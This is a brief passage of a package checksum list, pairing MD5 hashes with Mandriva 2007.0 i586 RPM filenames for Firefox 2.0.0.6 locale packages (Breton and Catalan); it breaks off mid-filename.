840b26d446aa37cbdf2e46636ae478ae 2007.0/i586/mozilla-firefox-br_FR-2.0.0.6-1mdv2007.0.i586.rpm 70a68538df6a2477f8bd2af38598fd1e 2007.0/i586/mozilla-firefox-ca-2.0.0.6-1m
